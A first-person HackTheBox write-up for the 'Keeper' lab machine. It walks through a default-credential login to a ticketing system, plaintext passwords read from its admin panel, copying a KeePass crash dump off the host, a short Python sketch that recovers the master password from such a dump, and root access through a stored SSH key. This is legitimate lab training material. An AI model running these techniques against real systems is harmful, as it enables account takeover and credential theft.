HackTheBox: Keeper


I'm doing this one as soon as it releases, so it will be seasonal. Hopefully I'll be able to finish it today.

This will be fun; this is the first box I've ever attempted that was BRAND NEW, with no writeups or answers out there at all. Let's see how it goes.


Only two ports are open:

1) SSH on 22
2) HTTP on 80

The HTTP service is using nginx. The script scan suggests that the system is Ubuntu.

Visiting the web page in the browser, we are prompted to manually redirect to "tickets.keeper.htb". So we'll go ahead and add "keeper.htb" and "tickets.keeper.htb" to /etc/hosts.

It appears to be a login page for a request ticket system. The software appears to be "Best Practical", version 4.4.4+dfsg.

All we have is a login page, and there does not appear to be an account creation option.

Let's do a quick search for vulnerabilities on Google. I'll run gobuster in the background. Note on this: I had to use --exclude-length 0 to get this to run properly, as non-existent paths would still yield a 302 status with length 0. Rather than filter out 302s I decided to just filter out 0-length entries. This is already catching a few strange entries.

No obvious vulnerabilities showed up on Google, and nothing on searchsploit.

/rtop directory

Navigating to http://tickets.keeper.htb/rtop, as spotted by gobuster, we get an error message:

An internal RT error has occurred. Your administrator can find more details in RT's log files.

What is RT? What does this mean? It has something to do with the ticket support system "Best Practical"; just by coincidence a message about RT popped up on their home page as I glanced at it. Oh okay: it's just "Request Tracker."

Getting in to the RT app

Wow... the default creds let me sign in, =="root:password"==. That's hilarious.

I actually tried that once and it failed, guess I typed "password" wrong... glad I tried it again.

There's not a ton to sift through on this page. It's basically a control panel for viewing and creating tickets.

There's one open ticket, titled "Issue with Keepass Client on Windows" from webmaster@keeper.htb. This also gives us the name of the webmaster: ==# User: lnorgaard (Lise Nørgaard)==.

The site may be vulnerable to IDORs for enumerating users via the 'id' param: http://tickets.keeper.htb/rt/User/Summary.html?id=14 But I may not need to do that anyway. As root, I may be able to just view all users.


In the ticket we have the following:

Attached to this ticket is a crash dump of the keepass program. Do I need to update the version of the program first...?  

However, I don't actually see the attached crash dump. We do have the following at the bottom of the ticket page:

I have saved the file to my home directory and removed the attachment for security reasons.  
Once my investigation of the crash dump is complete, I will let you know.

Hmm. Are we able to view her home directory through the web page?

Well actually, let's first just try to SSH in as lise/inorgaard and guess at some potential passwords... no luck there.

Before trying to access her home directory through the web app, let me just take a quick look at what tools we are able to use on the site. There's an 'admin' tab.

If I try to search 'assets' for anything belonging to Inorgaard, I get an interesting message:

# Possible cross-site request forgery

RT has detected a possible **cross-site request forgery** for this request, because the Referrer header supplied by your browser (tickets.keeper.htb:80) is not allowed by RT's configured hostname (keeper.htb:80). A malicious attacker may be trying to **modify or access a search** on your behalf. If you did not initiate this request, then you should alert your security team.

If you really intended to visit http://keeper.htb/rt/Asset/Search/index.html and modify or access a search, then **[click here to resume your request](http://keeper.htb/rt/Asset/Search/index.html?CSRF_Token=2244c57a9d8eddd3d96b96162bc4ec97)**.

I don't think this would be very useful though, since we already have privileged user creds.

Let's explore the 'admin' tab. Apparently here we can view all users' passwords... Inorgaard's is set to "Welcome2023". Try SSH in as her again? No luck.

Okay, so it looks like the 'admin'-->'tools'-->'system configuration' page is a goldmine. It has info about where the machine itself is installed, it looks like.

Skimming through this we also have some info about the database:

Database port: 3306
Database name: rtdb
Database admin: 'postgres'
Database type: 'mysql'
Database user: 'rtuser'

SSH'ing in successfully as Lise Norgaard

Wow, I'm retarded. I thought the one user's name was "Lisa Inorgaard", but it's actually just "Lisa Norgaard", and her username is "lnorgaard" with an 'L'. This whole time I thought it was 'Inorgaard' with an i. Fuck.

Anyway, once I realized that, I successfully SSH'd in using =="lnorgaard:Welcome2023!"==, which are the same creds as on the site.

Damn, that was easy.

The SSH login prompt caught my eye:

You have mail.
Last login: Sat Aug 12 22:08:27 2023 from

I have mail. I'm not making the same mistake I made last time of misreading the file as an empty directory. Let me check it out. Okay, it looks like the mail is just a copy of the support ticket from the site. Which reminds me, I should be able to view that crash log now.

First though, it looks like I might be inside a container, or maybe there are weird permissions set. 'w' doesn't show anyone online despite being SSH'd in, and ps aux only has a few lines and no init.

Anyway, back to the KeePass stuff. We have a zip file of the dump in her directory:

lnorgaard@keeper:~$ ls
RT30000.zip  user.txt

I exfiltrated it using a python simple http server:

lnorgaard@keeper:~$ python3 -m http.server 1234

Then I unzipped the file on my machine revealing the following contents:

KeePassDumpFull.dmp passcodes.kdbx

Okay. Let's see what we can do with these.

Investigating the dump file and keepass DB

I tried fruitlessly to figure this out myself for about an hour. Essentially, given that this is a CTF, it looks like what I have to do is scan the minidump (basically a program memory dump preceding a crash) for the master key to unlock the KeePass database.

I just found this post online, which seems to have been made at the same time as this box: https://www.bleepingcomputer.com/news/security/keepass-exploit-helps-retrieve-cleartext-master-password-fix-coming-soon/

This tool worked (required fuckery with .NET install though); it found a potential password, though it had "holes" in it in the sense that it wasn't able to ascertain every character.

It was able to resolve the password to:

Combined: ●{,, l, `, -, ', ], A, I, :, =, _, c, M}dgr●d med fl●de

I thought it had just given me junk, but I copy-pasted "dgrd med flde" into Google and got a result for "rødgrød med fløde", a Danish recipe.
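Why the recovered string opens with a hole and shows braces of alternatives: the KeePass 2.x password box leaves a leftover UTF-16 string of N mask bullets followed by the N-th typed character for every keystroke, so a scan of the dump recovers each position from the second one onward, and any stray bullet string of the same depth shows up as an extra candidate. This is an added illustration on a constructed buffer, not code from the writeup or from the linked tool; the leftover strings and the noise around them are made up here.

```python
import re

BULLET = "\u25cf"  # the mask character drawn by the password box

def leftover(depth: int, ch: str) -> bytes:
    """UTF-16LE string the box leaves behind after the depth-th keystroke (constructed)."""
    return (BULLET * depth + ch).encode("utf-16-le")

# Constructed dump: leftovers for "?assword" with an extra candidate at position 4,
# no leftover for position 5, and a fully masked display string with nothing after it.
SAMPLE_DUMP = (
    b"\x00" * 8
    + leftover(1, "a") + b"\x00\x00"
    + leftover(2, "s") + b"\x00\x00"
    + leftover(3, "s") + b"\x00\x00"
    + leftover(4, "w") + b"junk"
    + leftover(4, "M")           # stray string of the same depth -> ambiguity
    + leftover(6, "r") + b"\x00\x00"
    + leftover(7, "d")
    + (BULLET * 7).encode("utf-16-le")
)

def recover_candidates(dump: bytes) -> dict[int, set[str]]:
    """Map each password position (>= 1) to the characters seen right after a run
    of that many bullets. Position 0 never appears, which is the leading hole."""
    cands: dict[int, set[str]] = {}
    for m in re.finditer(rb"(?:\xcf\x25)+", dump):   # U+25CF in UTF-16LE is CF 25
        depth = len(m.group()) // 2
        unit = dump[m.end():m.end() + 2]
        ch = unit.decode("utf-16-le", errors="ignore") if len(unit) == 2 else ""
        if ch and ch.isprintable():
            cands.setdefault(depth, set()).add(ch)
    return cands

def combined(cands: dict[int, set[str]]) -> str:
    """Render candidates the way the tool's 'Combined:' line does: a bullet for an
    unknown position, the character when unique, and {a, b} when ambiguous."""
    if not cands:
        return ""
    out = [BULLET]  # first character is not recoverable
    for pos in range(1, max(cands) + 1):
        found = sorted(cands.get(pos, set()))
        if len(found) == 1:
            out.append(found[0])
        elif found:
            out.append("{" + ", ".join(found) + "}")
        else:
            out.append(BULLET)
    return "".join(out)

if __name__ == "__main__":
    print("Combined:", combined(recover_candidates(SAMPLE_DUMP)))
```

Defensively, the takeaway is that any process dump of an unpatched KeePass 2.x carries the typed master password in this shape, which is why the crash dump attached to the ticket mattered.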

I copy and pasted this (WITH the special characters) into the password field of kpcli (a keepass db client), and it fucking worked!!!

$ kpcli --kdb=passcodes.kdbx
Provide the master password: (Rødgrød med fløde)

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===


Now I was able to skim through and find the 'keeper' network passwords:

kpcli:/passcodes/Network> ls
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System
kpcli:/passcodes/Network> show 0

Title: keeper.htb (Ticketing Server)
Uname: root
 Pass: F4><3K0nd!
Notes: PuTTY-User-Key-File-3: ssh-rsa
       Encryption: none
       Comment: rsa-key-20230519
       Public-Lines: 6
       Private-Lines: 14
       Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

So it looks like we have an RSA key for root, in PuTTY format.

We can convert the key to OpenSSH format using the command

$ puttygen putty_key -O private-openssh -o id_rsa

And then ssh into the server using that key:

$ ssh -i ./id_rsa root@              
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have new mail.
Last login: Sun Aug 13 02:21:28 2023 from